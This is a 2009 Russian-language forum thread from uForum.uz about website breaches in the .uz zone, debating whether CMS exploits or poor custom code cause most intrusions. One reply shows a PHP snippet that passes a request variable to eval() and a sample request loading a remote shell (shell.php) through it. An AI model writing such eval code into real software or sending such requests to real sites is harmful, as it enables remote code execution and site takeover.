Моё меню Общее меню Сообщество Правила форума Все прочитано
Вернуться   uForum.uz > ИКТ и телеком > Информационная безопасность > Инциденты
Перезагрузить страницу Взломы в зоне .UZ
Сообщения за день Поиск
Знаете ли Вы, что ...
...инструкция по установке аватара описана в Правилах форума.
<< Предыдущий совет - Случайный совет - Следующий совет >>

Инциденты Обсуждение произошедших инцидентов информационной безопасности


Ответить
 
Опции темы Опции просмотра
Старый 22.01.2009 11:11   #1  
Known ID Group uParty Member
Аватар для Dolphin
Оффлайн
Imperium of Man
Inquisitor
Сообщений: 5,990
+ 5,680  4,442/2,033
– 128  137/102

Russian FederationОтправить сообщение для Dolphin с помощью ICQОтправить сообщение для Dolphin с помощью Skype™Facebook
Цитата:
Сообщение от CTAPu4OK Посмотреть сообщение
В зоне Уз более 50% сайтов подверженные атаке... и кто в этом виноват ? программисты.. которые не знают все уловки и не могут мыслить как хакеры.
Вообще-то подавляющее большинство сайтов в зоне uz работают на разнообразных CMS, вордпрессах, джумлах и подобных вещах - а эксплоиты, юзающие их ошибки - не редкость. Как-раз таки простенький самописный движок сложней поломать - непопулярен его исходный код, и в нем нет лишних функций. У многих в админке хостера вообще пароли простые.
Цитата:
Сообщение от CTAPu4OK Посмотреть сообщение
Мое мнение... в сети Уз должен быть хоть один сайт про Хакинг...
Зачем? Он не сразу догонит ресурсы по секьюрити в зоне ru и тем более, в доткоме, соответственно, загнется. Было дело.
Цитата:
Сообщение от CTAPu4OK Посмотреть сообщение
я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...
Этим вы приведете пример своего незнания языка. Логика хакеров (тем более "кулхацкеров", качающих с ксакепа эксплоиты) тут ни при чем. Вначале нужно понять конструкцию и логику вебсервера и запомнить элементарные, но надежные методы защиты от SQL-иньекций. В 98% случаев этого вполне достаточно.
Ответить 
2 "+" от:
Старый 18.06.2009 23:11   #2  
Аватар для CTAPu4OK
Оффлайн
Сообщений: 28
+ 1  4/2
– 0  1/1

Uzbekistan
Talking
Цитата:
Сообщение от Timur Rasulov Посмотреть сообщение
Цитата:
Сообщение от CTAPu4OK Посмотреть сообщение
я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...
Этим вы приведете пример своего незнания языка. Логика хакеров (тем более "кулхацкеров", качающих с ксакепа эксплоиты) тут ни при чем. Вначале нужно понять конструкцию и логику вебсервера и запомнить элементарные, но надежные методы защиты от SQL-иньекций. В 98% случаев этого вполне достаточно.
С чего вы взяли что если я приведу пример то покажу всем свою безграмотность в PHP ?
Один раз ко мне постучался знакомый, PHP занимается 3 года, попросил нарисовать и сверстать шаблон под главную...
Но как только я глянул в код, я ахнул!!!!

он решил засунуть переменную под евал
PHP код:
<?
eval($test);
?>
Один запрос
http://test.ru/index.php?test=http://xak/shell.php
Вот вам и самописные двиги которые трудно ломать =D

А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь....
SQL INJ
PHP INJ
XSS все виды
Не защищеные поля веб форм
Раскрытие путей
и прочии ошибки...
Ответить 
Ответить



Обратная связь - Реклама на сайте - uForum.uz - Архив - Условия использования - Вверх

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. Перевод: zCarot
Advertisement System V2.5 By Branden
OOO «Единый интегратор UZINFOCOM»


Новые 24 часа Кто на форуме Новички Поиск Кабинет Все прочитано Вверх